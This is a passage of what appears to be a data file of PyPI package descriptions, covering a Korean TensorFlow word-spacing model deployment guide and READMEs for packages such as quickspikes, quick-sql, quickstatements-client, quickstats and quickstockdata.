\uc544\ub798 \uba85\ub839\ub4e4\uc740 SavedModel\uc744 \ub9cc\ub4dc\ub294 \uac83\uacfc\ub294 \ubb34\uad00\ud558\uba70 \ucd94\uac00\uc801\uc778 \uc124\uba85\uc744 \uc704\ud55c \uac83\uc785\ub2c8\ub2e4.$saved_model_clishow--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defserving_default2020-11-1517:02:30.861944:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.1\nThegivenSavedModelSignatureDefcontainsthefollowinginput(s):inputs['texts']tensor_info:dtype:DT_STRINGshape:(-1)name:serving_default_texts:0\nThegivenSavedModelSignatureDefcontainsthefollowingoutput(s):outputs['spaced_sentences']tensor_info:dtype:DT_STRINGshape:unknown_rankname:StatefulPartitionedCall_1:0\nMethodnameis:tensorflow/serving/predictdefault\ub294 text\ub97c \uc785\ub825\ubc1b\uace0 \ub744\uc5b4\uc4f0\uae30\uac00 \uc644\ub8cc\ub41c \ubb38\uc7a5\uc744 \ubc18\ud658\ud558\ub3c4\ub85d \ub418\uc5b4\uc788\uc2b5\ub2c8\ub2e4. \uc704\uc758 saved_model_cli\ub97c \ud1b5\ud574 \uc0b4\ud3b4\ubcf4\uba74 DT_STRING\uc774 \uc785\ucd9c\ub825\uc778 \uac83\uc744 \uc54c \uc218 \uc788\uc2b5\ub2c8\ub2e4.$saved_model_clirun--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defserving_default\\--input_exprs'texts=[\"\uadfc\ub370\uc774\uac83\uc880\ub744\uc6cc\uc8fc\uc2dc\uaca0\uc5b4\uc694?\", \"\uc2eb\uc740\ub370\uc601\u314e\u314e\"]'2020-11-1517:06:27.735637:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.12020-11-1517:06:28.659347:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcuda.so.1[\uac01\uc885TFlog\ub4e4...]Resultforoutputkeyspaced_sentences:[b'\\xea\\xb7\\xbc\\xeb\\x8d\\xb0 \\xec\\x9d\\xb4\\xea\\xb2\\x83 \\xec\\xa2\\x80 \\xeb\\x9d\\x84\\xec\\x9b\\x8c \\xec\\xa3\\xbc\\xec\\x8b\\x9c\\xea\\xb2\\xa0\\xec\\x96\\xb4\\xec\\x9a\\x94?'b'\\xec\\x8b\\xab\\xec\\x9d\\x80\\xeb\\x8d\\xb0 \\xec\\x98\\x81\\xe3\\x85\\x8e\\xe3\\x85\\x8e']\uc774\ub7f0 \uc2dd\uc73c\ub85c saved_model\uc774 \uc798 \uc800\uc7a5\ub418\uc5c8\uace0 \uc81c\ub300\ub85c \ub3d9\uc791\ud558\ub294\uc9c0 \ud655\uc778\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Unicode \ubc14\uc774\ub108\ub9ac\ub85c \ub098\uc640\uc11c \uc870\uae08 \ubd88\ud3b8\ud55c\ub370 \ud55c\uae00\ub85c \ubc14\uafd4\ubcf4\uba74 [\"\uadfc\ub370 \uc774\uac83 \uc880 \ub744\uc6cc \uc8fc\uc2dc\uaca0\uc5b4\uc694?\",\"\uc2eb\uc740\ub370 \uc601\u314e\u314e\"] \uc73c\ub85c \ub744\uc5b4\uc4f0\uae30\ub97c \ud574\uc8fc\uc5c8\uc2b5\ub2c8\ub2e4.$saved_model_clishow--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defmodel_inference2020-11-1517:03:19.988061:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.1\nThegivenSavedModelSignatureDefcontainsthefollowinginput(s):inputs['tokens']tensor_info:dtype:DT_INT32shape:(-1,-1)name:model_inference_tokens:0\nThegivenSavedModelSignatureDefcontainsthefollowingoutput(s):outputs['output_0']tensor_info:dtype:DT_FLOATshape:(-1,-1)name:StatefulPartitionedCall:0\nMethodnameis:tensorflow/serving/predict\ub610 \ud558\ub098\uc758 Signature \ud568\uc218\ub294 \ubb38\uc7a5\uc744 \uae00\uc790\ub97c \ub2e4 \uc798\ub77c\uc11c Vocab\uc744 \uc774\uc6a9\ud574 \uc22b\uc790\ub85c \ubcc0\ud658\ub41c \uc785\ub825\uc744 \ubc1b\uace0, \uac01 \uc790\ub9ac\ub97c \ub744\uc6cc\uc57c\ud560 \ud655\ub960\uc744 \uc54c\ub824\uc90d\ub2c8\ub2e4.\uc544\uae4c\uc640 \uac19\uc740 \ubb38\uc7a5\uc744 \uc22b\uc790\ub85c \ubcc0\ud658\ud558\uc5ec 
\ud14c\uc2a4\ud2b8\ud574\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.$saved_model_clirun--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defmodel_inference\\--input_exprs'tokens=[[88,26,4,100,112,1241,93,64,38,56, 6,19,15],[216,33,26,202,67,67,0,0,0,0,0,0,0]]'[\uac01\uc885Tensorflowlog...]Resultforoutputkeyoutput_0:[[2.5608379e-039.8520654e-011.2721949e-039.7731644e-019.9997485e-011.6742251e-075.0763595e-012.1732522e-031.0649196e-032.6994228e-041.1066308e-041.4717710e-032.8897190e-01][3.6909140e-041.2601367e-028.4685940e-017.0986725e-061.3404434e-055.6068022e-102.8169470e-121.1617506e-172.8605146e-172.8605146e-172.8605146e-175.3611558e-162.1768996e-07]]\ub450 \ubb38\uc7a5\uc758 \uae38\uc774\uac00 \ub2e4\ub978 \uacbd\uc6b0\uc5d0\ub294 \uc704 \uc608\uc2dc\ucc98\ub7fc 0\uc73c\ub85c \ud328\ub529\uc744 \ud574\uc918\uc57c\ud569\ub2c8\ub2e4.\uacb0\uacfc\ub97c \ubcf4\uba74 \uac01 \uc704\uce58\ub9c8\ub2e4 \ub744\uc5b4\uc57c\ud560 \ud655\ub960\uc774 \ub098\uc654\uc2b5\ub2c8\ub2e4.Deploy using Tensorflow/serving docker$dockerrun--rm--nametest-p8500:8500-p8501:8501\\--mounttype=bind,source=`pwd`/saved_spacer_model,target=/models/spacer\\-eMODEL_NAME=spacer\\-ttensorflow/serving:latest\uac04\ub2e8\ud788 docker\ub85c tensorflow serving \uc11c\ubc84\ub97c \uc5ec\ub294 \uba85\ub839\uc785\ub2c8\ub2e4. \ud604\uc7ac \ubaa8\ub378 \ud30c\uc77c\uc740 \uc2e4\uc81c\ub85c\ub294pwd/saved_1pacer_model/1 \uc5d0 \uc800\uc7a5\ub418\uc5b4 \uc788\uc2b5\ub2c8\ub2e4.$curl-XPOSTlocalhost:8501/v1/models/spacer:predict\\-H\"Content-Type: application/json\"\\-d'{\"instances\":[\"\uadfc\ub370\uc774\uac83\uc880\ub744\uc6cc\uc8fc\uc2dc\uaca0\uc5b4\uc694!\", \"\uc2eb\uc740\ub370\uc601\u314e\u314e\"]}'{\"predictions\":[\"\uadfc\ub370 \uc774\uac83 \uc880 \ub744\uc6cc \uc8fc\uc2dc\uaca0\uc5b4\uc694!\",\"\uc2eb\uc740\ub370 \uc601\u314e\u314e\"]}\uc774\uc81c curl\uc744 \uc774\uc6a9\ud574 \ud14c\uc2a4\ud2b8\ud574\ubcf4\uba74 \uc815\uc0c1\uc801\uc73c\ub85c \ub744\uc5b4\uc4f0\uae30\uac00 \uc644\ub8cc\ub41c \ubb38\uc7a5\uc744 \ubc18\ud658\ud558\ub294 \uac83\uc744 \ubcfc \uc218 \uc788\uc2b5\ub2c8\ub2e4. signature function\uc744 \uc9c0\uc815\ud558\uba74 model_inference\ub9cc \ud558\ub294 \uac83\ub3c4 \uac00\ub2a5\ud569\ub2c8\ub2e4.Deploy using Tensorflowjs\ub2e4\uc74c\uc740 tensorflowjs\ub97c \uc774\uc6a9\ud574\uc11c \uc11c\ubc84\uac00 \uc544\ub2cc \ud074\ub77c\uc774\uc5b8\ud2b8\uc758 \ube0c\ub77c\uc6b0\uc800\uc5d0\uc11c \ucd94\ub860\ud558\ub3c4\ub85d\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4. 
\ub370\ubaa8\ud398\uc774\uc9c0\uc5d0 \uc788\ub294 \uac83\ub3c4 Tensorflow JS\ub97c \uc774\uc6a9\ud55c \uac83\uc785\ub2c8\ub2e4.Make TFJS Graph Modelpython-mscripts.convert_to_tfjsmodel\\--saved-model-path[saved_model_path]\\--output-path[output_dir_path]\uc774 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 Tensorflow JS \ubaa8\ub378\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\nTFJS\uc5d0\uc11c\ub3c4 \ubb38\uc7a5\uc744 \ub123\uace0 \ubb38\uc7a5\uc774 \ub098\uc624\ub3c4\ub85d \ub9cc\ub4e4\uace0 \uc2f6\uc5c8\uc9c0\ub9cc Vocab\uc744 \ud3ec\ud568\ud558\uace0 \uc788\ub294 signature function\uc740 TFJS\ub85c \ubcc0\ud658\ud558\ub294\ub370 \uc5d0\ub7ec\uac00 \ubc1c\uc0dd\ud558\uc5ec TFJS\uc5d0\uc120 \ubaa8\ub378 \ucd94\ub860\ub9cc \ud558\ub3c4\ub85d \ud588\uc2b5\ub2c8\ub2e4.\n\uc704 \ud30c\uc774\uc36c \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc774\uc6a9\ud558\uc9c0 \uc54a\ub354\ub77c\ub3c4tensorflowjs_wizard\ub098tensorflowjs_converter\uba85\ub839\uc5b4\ub97c \ubc14\ub85c \uc0ac\uc6a9\ud574\ub3c4 \ub429\ub2c8\ub2e4.Use Tensorflow JS Graph Modelhttps://js.tensorflow.org/api/latest/\ub97c \ucc38\uace0\ud558\uba74 js\ub85c \uc0ac\uc6a9\ud560 \uc218 \uc788\ub294 API\uac00 \uc815\ub9ac\ub418\uc5b4 \uc788\uc2b5\ub2c8\ub2e4.tfjs\ub97c \uc0ac\uc6a9\ud558\ub824\uba74https://www.tensorflow.org/js/tutorials/setup\uc5d0\ub098\uc640\uc788\ub294 \uac83\ucc98\ub7fc tensorflow js \ud30c\uc77c\uc744 \ub123\uc5b4\uc918\uc57c\ud569\ub2c8\ub2e4.\uc6b0\ub9ac\uac00 \uc704\uc5d0\uc11c \ub9cc\ub4e0 \uac74 tf.GraphModel\uc774\ubbc0\ub85ctf.loadGraphModel\ud568\uc218\ub85c \ubd88\ub7ec\uc640\uc11c \uc0ac\uc6a9\ud558\uba74 \ub429\ub2c8\ub2e4."} +{"package": "quickspider", "pacakge-description": "see github."} +{"package": "quickspikes", "pacakge-description": "quickspikesThis is a very basic but very fast window discriminator for detecting and\nextracting spikes in a time series. It was developed for analyzing extracellular\nneural recordings, but also works with intracellular data and probably many\nother kinds of time series.Here's how it works:The algorithm iterates through the time series. When the signal crosses the threshold (1) going away from zero, the algorithm then looks for a peak (2) that occurs within some number of samples from the threshold crossing. The number of samples can be adjusted to filter out broad spikes that are likely to be artifacts. If a peak occurs, its sample index is added to an array. These times can be used as-is, or they can be used to extract samples to either side of the peak for further analysis (e.g. spike sorting).The algorithm uses a streaming pattern (i.e., it processes chunks of data and keeps its state between chunks), so it's suitable for realtime operations. Many signals of interest will require highpass filtering to remove slow variations.Installation and UseThe algorithm is written in cython. You can get a python package from PyPI:pip install quickspikesOr to build from a copy of the repository:pip install .To detect peaks, you instantiate the detector with parameters that match the events you want to detect, and then send the detector chunks of data. For example, an extracellular recording at 20 kHz stored in 16-bit integers may have a noise floor around 2000, and the spikes will be on the order of 20 samples wide:importquickspikesasqsdet=qs.detector(1000,30)times=det.send(samples)You can continue sending chunks of data by callingsend(). The detector will keep its state between calls, so you can detect spikes that occur on chunk boundaries. 
For example, if you're receiving data from some kind of generator, you could use a pattern like this:forchunkinmy_data_generator():times=det.send(chunk)# process timesConversely, if the data are not contiguous, you should reinitialize the detector for each chunk.You can adjust the detector's threshold at any point, for example to compensate for shifts in the mean and standard deviation of the signal:reldet=qs.detector(2.5,30)reldet.scale_thresh(samples.mean(),samples.std())times=reldet.send(samples)To detect negative-going events, you'll need to invert the signal.There are also some functions you can use to extract and align spike waveforms. Given a list of times returned from thedetector.send()method, to extract waveforms starting 30 samples before the peak and ending 270 samples after:f_times=qs.filter_times(times,30,samples.size-270)spikes=qs.peaks(samples,f_times,30,270)times,aligned=qs.realign_spikes(f_times,spikes,upsample=3,jitter=4)Note that the list of event times may need to be filtered to avoid trying to access data points outside the bounds of the input time series. If you care about these events, you'll need to pad your input signal. Therealign_spikesfunction uses a sinc-based resampling to more accurately locate the peak of the event.There is also a reference copy of an ANSI C implementation and anf2pywrapper inf2py/. This algorithm is slightly less efficient and flexible, but may give better results if included directly in a C codebase.Intracellular spikesThere are some specialized tools for working with intracellular data.\nIntracellular recordings present some special challenges for detecting spikes.\nThe data are not centered, and spike waveforms can change over the course of\nstimulation. The approach used here is to find the largest spike in the recording,\n(typically the first) and locate the onset of the spike based on when the derivative begins to rapidly increase. The peak and onset are used to set a threshold for extracting subsequent spikes.The following is an example for a recording at 50 kHz of a neuron with spikes that have a rise time of about 1 ms (50 samples). Spikes waveforms will start 7 ms before the peak and end 40 ms after, and will be trimmed to avoid any overlap with subsequent spikes.fromquickspikes.intracellularimportSpikeFinderdetector=SpikeFinder(n_rise=50,n_before=350,n_after=2000)detector.calculate_threshold(samples)times,spikes=zip(*detector.extract_spikes(samples,min_amplitude=10))LicenseFree for use under the terms of the GNU General Public License. See [[COPYING]]\nfor details.If you use this code in an academic work, citations are appreciated. There is no methods paper describing the algorithm, but the most relevant reference is:C. D. Meliza and D. Margoliash (2012). Emergence of selectivity and tolerance in the avian auditory cortex. 
Journal of Neuroscience, doi:10.1523/JNEUROSCI.0845-12.2012"} +{"package": "quicksplit", "pacakge-description": "No description available on PyPI."} +{"package": "quick-sql", "pacakge-description": "#Quick SqlIt's a python library written purely in Python to do faster and better sqlite operationsWhy Quick Sqlite?No need to write such a lengthy SQL code.No need to create custom function for query.Best for lightweight and simpleSqlite3operationsNew features almost every week :)Main ContentsDatabase()Class containing methods and Sqlite operations.create_table()Function use to create table.insert()Function use to insert data.select_all()Function use to select all data from a column.select_from()Function use to select data from a single row.update()Function use to update data.delete()Function use to delet row.Database()ClassThis is the class which is responsible for database creation and all the operation under a database.Database(db_name)ParametersIt takes one parameter.db_nameMust be endswith \".db\" extensionExamplesHere is an exampleClick here!Database.create_table()FunctionThis is the function which is used to create table in databaseDatabase.create_table(table_name,**kwargs)ParametersIt takes 1 or more parameterstable_nameName of the table you want to be in your databasekwargs must be in the formcolumn_name = dtypeDtype must be valid sqlite datatype.ReturnNoneExamplesHere is an exampleClick here!Database.insert()FunctionThis function is used to insert data in table.Database.insert(table_name,column,data_to_insert)ParametersIt takes 3 parameterstable_nameName of the table in which you want to insert data.columnsName of the column in which you want to insert data.Must be list.data_to_insertData which you want to insert.Must be listNotelen(column)must be equal tolen(data_to_insert)column[0]will store the data which is atdata_to_insert[0]ReturnNoneExamplesHere is an exmaple.Click here!Database.select_all()FunctionThis function is used to select all the data from a given columnDatabase.select_all(table_name,column,fetch=\"single\")ParametersIt takes 3 parameters , 2 are must and other is optionaltable_nameName of the table from which you want to get or select data.columnName of the column.fetchThis depend upon you if you want tofetchall()use \"all\" otherwise \"single\".Default is \"single\"ReturnTupleExamplesHere is an example.Click here!Database.select_from()FunctionThis function is used to select data from a particular row.Database.select_from(table_name,column,from_where,fetch=\"single\")ParametersIt takes 4 parameter, 3 are must and other is optionaltable_nameName of the table from which you want to get or select data.columnName of the column.from_whereIt is the list of value and a pair from where you want to get data.fetchThis depend upon you if you want tofetchall()use \"all\" otherwise \"single\".Default is \"single\"Notelen(from_where)should be equals to 2from_where[0]should be a column name andfrom_where[1]should be the value of that column which belongs to a row.ReturnTupleExamplesHere is an example.Click here!Database.update()FunctionThis function is use to update data of table.Database.update(table_name,column,value,from_where)ParametersIt takes 4 parameters.table_nameThe table in which you want to update data.columnColumn name.Must be a list.valueValue which going to be store in that.Must be a list.from_wherePair of column and value.Must be a list.Notelen(column)==len(value)column[0]store the data invalue[0]ReturnNoneExamplesHere is an example.Click 
here!Database.delete()FunctionThis function is used to delete a row from a table.Database.delete(table_name,from_where)ParametersIt takes 2 parameters.table_nameThe table in which you want to delete data.from_wherePair of column and value.ReturnNoneExamplesHere is an example.Click here!"} +{"package": "quick-sqlite", "pacakge-description": "quick_sqliteQuickSqlite helps you work with sqlite3 databases in a much easier way.\nIt is simple and easy to use. You will not have to repeatedly write sql statements.\nThis will also improve your productivity by recognizing what's happening because of informative function names.Installationpip install quick_sqliteRead more in the documentationhere"} +{"package": "quick-sqlite-database", "pacakge-description": "No description available on PyPI."} +{"package": "quick-start", "pacakge-description": "QuickStartCreates a project based on a templateInstallationLinux:$pythonsetup.pyinstall--user$~/.local/bin/quickstart_installerExample of use$pyinitnome_do_projetoConfiguration for Developmentpythonsetup.pydevelopRelease history* Work in progressMetaYour Name \u2013@ztzandre\u2013andreztz@gmail.comDistributed under the XYZ license. SeeLICENSEfor more information.https://github.com/andreztz/quick-install"} +{"package": "quickstart-django", "pacakge-description": "Quickstart_djangoA small python package which will help you to quickly start your django project. 
It will create a django project with all the necessary files and folders in just single command.Istallationpy-mpipinstallquickstart-djangoUsagepy-mquickstart_djangoproject_nameapplication_nameRun LocallyInstall dependenciespy-mpipinstallDjangoClone the projectgitclonehttps://github.com/jaythorat/quickstart_djangoExecute the commandpy./quickstart_django/src/quickstart_django/quickstart_django.pyproject_nameapplication_nameThis will create a working django application with all the initial setup which is needed to run the app. Just change directory to project directory and runpy manage.py runserverAuthors@jaythorat"} +{"package": "quickstarter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickstartlog", "pacakge-description": "A simple log utility, write log into console & file(TimedRotatingFileHandler)Examplesmain.py:import quickstartlog as qslog\nqslog.debug('this is debug')\nqslog.info('this is info')\nqslog.warn('this is warning')\nqslog.error('this is error')\nqslog.info_ex(qslog.LIGHT_GREEN)('this is info with LIGHT_GREEN')console output & ./var/log/main.log:[19:30:07 INFO ] this is info\n[19:30:07 WARNI] this is warning\n[19:30:07 ERROR] this is error\n[19:30:07 INFO ] this is info with LIGHT_GREEN"} +{"package": "quickstartup", "pacakge-description": "DocumentationQuickstartup package used byQuickstartup TemplateScreenshotsLanding PageLanding PageSignup FormSignup form (you can easily customize it)Signin FormSignin formReset PasswordReset PasswordContact FormContact FormSample AppSample Application showing user profile editorHistory0.19.0Add missing migration scripts0.18.0Upgrade bootstrap to 4.5.2Remover tether requirementFix issue #34 error in expiration time in emails0.17.1Fix token expiration settings0.17.0Requires Django 3.1Update requirementsFix and remove warningsChange token expiration config to use seconds instead of days0.16.2Add PermissionMixin to the base User model (#38 thanks to @shahabaz)0.16.1Small fix in documentationFix tox envlist0.16.0Update Django requirementsUpdate Django support to 3.0 major release0.15.1Update Django requirementsReplace default Django unittest with pytest0.14.1Fix Django requirement rule0.14.0Update requirements for Django 2.1 and fixes deprecation-related issues0.13.0Update codebase to work with Django 2Update third-party requirements0.12.3Remove explicit reference to view that coud be inexistentAdd vertical normal size include fieldsAdd a missing \u2018safe\u2019 mark on error message0.12.2Fix some issues with field includes adding safe filter in help/error\nmessages0.12.1Fix a minor CSS class issue in app.html navbar0.12.0Update middleware implementation to make it Django 1.10 format0.11.0Remove dj-{static,media} and add log-setting helper0.10.2Update more requirements0.10.1Update to Django 1.10.2Update to bootstrap4-alphaUpdate other requirements and fix templates0.9.5Update requirements.txt (using pur)Use py35 for tests in tox0.9.4Update django-ipware version requirementAdd Py3.5 in setup.py classifiers0.9.3Update requirements0.9.2Update translations0.9.1Add Django password validators in all password-related forms.0.9.0Breaks everythingRename apps with prefixqs_*to avoida conflicts with user\u2019s appsRemove django-registration dependency0.6.0Improve Contact model representation string (eg. 
John Doe )Addipof user at contact application.0.5.7Replacenoreply@{domain} with PROJECT_CONTACT to enable\ntests on localhost (some SMTP servers does not accept this hostname)0.5.6Fix an blocker bug in import on contact app0.5.5Fixes and improvements in contact app (mainly in e-mail sending code)0.5.4Update requirements versions0.5.3Small refactor in footer_links block0.5.2Sticky footer!Add a block structure start_body after tag (for some analytics scripts)0.5.1Fix remaining formatting issues in some templates0.5.0Finish templates and static reorganization0.4.4More templates & static refactorings to make customization easy0.4.3Make signup form template overridable0.4.2Update messages and tranlations0.4.1Fix broken testAdd some screenshots in README.rst0.4.0Add one more template layer to make easy template overrideUpdate django-widget-tweak requirement version to 1.4.1Update app new visualFix some visual issues (like textarea resize handle in contact form)Reset password, now, redirect to Sign in form with a flash message instructions\ninstead of an specific page and fix message tag colors0.3.0New website visual0.2.7Add block to allow bootstrap navbar CSS classes configuration0.2.6CRITICAL: Add missing lib static files0.2.5Fix a release number issue0.2.4Move logo image to static root0.2.2Fix a bug on template_name configuration on profile-related views0.2.1Add missing migration script requirement0.2.0Consolidate migration scripts (break migration from projects with 0.1.X versions)Update and compile pt_BR translations0.1.9New settings for custom ProfileForm configuration0.1.8Remove django-nose requirement and use Django test runner instead.Reorganize Form classes in filesReorganize and split some test filesCode coverage: 89% (target: ~98%)Remove unused code in BaseUserManagerPEP8 and cosmetic fixesFix some requirements(-test).txt errors0.1.7Use Django Nose test runner with a \u201ctestproject\u201dFix a issue in template loader that forces quickstartup templates over application templates.Fix a Site database loading error during tests (table missing)0.1.6Update translations0.1.5Include translations0.1.4Bump Release number to fix a release error0.1.3Fix(?) again README.rst to enable rendering on PyPI0.1.2Fix(?) README.rst to enable rendering on PyPI0.1.1Remove boilerplate (incorrect) informations from README.rstAdd \u201cversion\u201d command into setup.py0.1.0First release on PyPI."} +{"package": "quickstartutil", "pacakge-description": "A simple utility for building application quickly.Examples"} +{"package": "quickstart-vdk", "pacakge-description": "Quickstart-VDKThis is the first VDK packaging that users would install to play around with.It packages:Plugin for a local database to get started quicklyPlugin for job management (vdk-control-cli)Plugin for local Control Service installation (vdk-server)See alsoVersatile Data Kit Getting Started."} +{"package": "quickstatements", "pacakge-description": "quickstatementsA python module for reconciling datasets to quickstatements / Wikidata format.It is still in an inception/pre-prototyping stage. 
For more info, check theWiki.Protoype branchThe tracer branch is dedicated to a few prototypes to play around before actually having a workable version of the package.The idea is to document on the repository Wiki alongside the development of the prototypes."} +{"package": "quickstatements-client", "pacakge-description": "QuickStatements ClientA data model and client for WikidataQuickStatements.\ud83d\udcaa Getting StartedHere's how to quickly construct some QuickStatementsimportdatetimefromquickstatements_clientimportDateQualifier,EntityQualifier,TextQualifier,EntityLinesubject_qid=\"Q47475003\"# Charles Tapley Hoytsubject_orcid=\"0000-0003-4423-4370\"reference_url_qualifier=TextQualifier(predicate=\"S854\",target=f\"https://orcid.org/0000-0003-4423-4370\")start_date=datetime.datetime(year=2021,day=15,month=2)start_date_qualifier=DateQualifier.start_time(start_date)position_held_qualifier=EntityQualifier(predicate=\"P39\",target=\"Q1706722\")employment_line=EntityLine(subject=subject_qid,predicate=\"P108\",# employertarget=\"Q49121\",# Harvard medical schoolqualifiers=[reference_url_qualifier,start_date_qualifier,position_held_qualifier],)>>>employment_line.get_line()'Q47475003|P108|Q49121|S854|\"https://orcid.org/0000-0003-4423-4370\"|P580|+2021-02-15T00:00:00Z/11|P39|Q1706722',How to send some QuickStatements to the API:fromquickstatements_clientimportQuickStatementsClientlines=[employment_line,...]client=QuickStatementsClient(token=...,username=...)res=client.post(lines,batch_name=\"Test Batch\")# see also res.batch_idimportwebbrowserwebbrowser.open_new_tab(res.batch_url)Note:tokenandusernameare automatically looked up withpystowif they aren't given.\nSpecifically, usingpystow.get_config(\"quickstatements\", \"token)andpystow.get_config(\"quickstatements\", \"username\").\ud83d\ude80 InstallationThe most recent release can be installed fromPyPIwith:$pipinstallquickstatements_clientThe most recent code and data can be installed directly from GitHub with:$pipinstallgit+https://github.com/cthoyt/quickstatements-client.git\ud83d\udc50 ContributingContributions, whether filing an issue, making a pull request, or forking, are appreciated. 
SeeCONTRIBUTING.mdfor more information on getting involved.\ud83d\udc4b AttributionThis code was originally written as a contribution toPyORCIDator.\nSpecial thanks to Tiago Lubiana [@lubianat] and Jo\u00e3o Vitor [@jvfe] for discussions and testing.\u2696\ufe0f LicenseThe code in this package is licensed under the MIT License.\ud83c\udf6a CookiecutterThis package was created with@audreyfeldroy'scookiecutterpackage using@cthoyt'scookiecutter-snekpacktemplate.\ud83d\udee0\ufe0f For DevelopersSee developer instructionsThe final section of the README is for if you want to get involved by making a code contribution.Development InstallationTo install in development mode, use the following:$gitclonegit+https://github.com/cthoyt/quickstatements-client.git\n$cdquickstatements-client\n$pipinstall-e.\ud83e\udd7c TestingAfter cloning the repository and installingtoxwithpip install tox, the unit tests in thetests/folder can be\nrun reproducibly with:$toxAdditionally, these tests are automatically re-run with each commit in aGitHub Action.\ud83d\udcd6 Building the DocumentationThe documentation can be built locally using the following:$gitclonegit+https://github.com/cthoyt/quickstatements-client.git\n$cdquickstatements-client\n$tox-edocs\n$opendocs/build/html/index.htmlThe documentation automatically installs the package as well as thedocsextra specified in thesetup.cfg.sphinxplugins\nliketexextcan be added there. Additionally, they need to be added to theextensionslist indocs/source/conf.py.\ud83d\udce6 Making a ReleaseAfter installing the package in development mode and installingtoxwithpip install tox, the commands for making a new release are contained within thefinishenvironment\nintox.ini. Run the following from the shell:$tox-efinishThis script does the following:UsesBump2Versionto switch the version number in thesetup.cfg,src/quickstatements_client/version.py, anddocs/source/conf.pyto not have the-devsuffixPackages the code in both a tar archive and a wheel usingbuildUploads to PyPI usingtwine. Be sure to have a.pypircfile configured to avoid the need for manual input at this\nstepPush to GitHub. You'll need to make a release going with the commit where the version was bumped.Bump the version to the next patch. If you made big changes and want to bump the version by minor, you can\nusetox -e bumpversion -- minorafter."} +{"package": "quickstats", "pacakge-description": "SetupClone the repository:git clone ssh://git@gitlab.cern.ch:7999/clcheng/quickstats.git1. CERN UserTo set up from lxplus, just dosource setup.sh2. Genearl UserTo set up locally, make sure you have pyROOT 6.24+ installed (using conda is recommended), and dopip install quickstatsInstalling pyROOTSimplest way to install pyROOT is via condaconda install -c conda-forge ROOTImportant: First-time compilationTo compile c++ dependencies, do this for first time usequickstats compileCommand Line ToolsRun Nuisance Parameter Pulls and Rankingquickstats run_pulls -i -d -p --poi --parallel -1 -o The following options are availableOptionDescriptionDefault-i/--input_filePath to the input workspace file--w/--workspaceName of workspace. Auto-detect by default.None-m/--model_configName of model config. Auto-detect by default.None-d/--dataName of dataset\"combData\"-p/--parameterNuisance parameter(s) to run pulls on. Multiple parameters are separated by commas. Wildcards are accepted. All NPs will be run over by default\"\"-x/--poiPOIs to measure. 
If empty, impact on POI will not be calculated.\"\"-r/--profileParameters to profile\"\"-f/--fixParameters to fix\"\"-s/--snapshotName of initial snapshot\"nominalNuis\"-o/--outdirOutput directory\"pulls\"-t/--minimizer_typeMinimizer type\"Minuit2\"-a/--minimizer_algoMinimizer algorithm\"Migrad\"-c/--num_cpuNumber of CPUs to use per parameter1--binned/--unbinnedWhether to use binned likelihoodTrue-q/--precisionPrecision for scan0.001-e/--epsTolerance1.0-l/--log_levelLog level\"INFO\"--eigen/--no-eigenCompute eigenvalues and vectorsFalse--strategyDefault fit strategy0--fix-cache/--no-fix-cacheFix StarMomentMorph cacheTrue--fix-multi/--no-fix-multiFix MultiPdf level 2True--offset/--no-offsetOffset likelihoodTrue--optimize/--no-optimizeOptimize constant termsTrue--max_callsMaximum number of function calls-1--max_itersMaximum number of Minuit iterations-1--parallelParallelize job across different nuisanceparameters using N workers. Use -1 for N_CPU workers.0--cache/--no-cacheCache existing resultTrue--excludeExclude NPs (wildcard is accepted)\"\"Plot Nuisance Parameter Pulls and Rankingquickstats plot_pulls --helpLikelihood Fit (Best-fit)quickstats likelihood_fit --helpRun Likelihood Scanquickstats likelihood_scan --helpAsymptotic CLs Limitquickstats cls_limit --helpCLs Limit Scanquickstats limit_scan --helpGenerate Asimov datasetquickstats generate_standard_asimov --helpInspect Workspacequickstats inspect_workspace --helpCreate Workspace from XML Cardsquickstats build_xml_ws --helpModify Workspace from XML Cards or Json Configquickstats modify_ws --helpCombine Workspace from XML Cards or Json Configquickstats combine_ws --helpCompare Workspacesquickstats compare_ws --helpRun Event Loop from Custom Config Filequickstats process_rfile --help"} +{"package": "quickstep", "pacakge-description": "No description available on PyPI."} +{"package": "quickstockdata", "pacakge-description": "QuickStockDataA python module that returns stock price data and stock symbols.InstallationInstallquickstockdatausingpip:$ pip install quickstockdataDescription of functionsget_prices :Input:symbol: Symbol of stock (string)intv: Interval of time (string, optional, default=1d)rng: Range of time (string, optional, default=1wk)intvandrngboth takes values from1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1moand3mo.ohlc: Specify High, Low, Open and Close prices (string, optional, default='high')stock_exc: specify stock exchange to get data from (string, optional, default='nse')Output:\nlist: A list of lists containing the timestamp and corresponding price for each data point.get_nse_symbols :Input: NoneOutput: A list of dictionaries containing the stock names and symbols of nse.get_nasdaq_symbols :Input: NoneOutput: A list of dictionaries containing the stock names and symbols of nasdaq.find_nse_stock :Input:search_term: search term to search for stock symbol in nse (string)Output: A list of dictionaries containing the stock names and symbols of nse.find_nasdaq_stock :Input:search_term: search term to search for stock symbol in nse (string)Output: A list of dictionaries containing the stock names and symbols of nasdaq."} +{"package": "quickstruct", "pacakge-description": "QuickStructQuickStruct is a small library written in Python that allows you to\neasily create C structs (and a bit more dynamic stuff) in Python!It's fairly easy to usefromquickstructimport*classPerson(DataStruct):name:Stringage:i8Structs can also be composedclassTeachingClass(DataStruct):teacher:Person# We use Array[T] to make it dynamic 
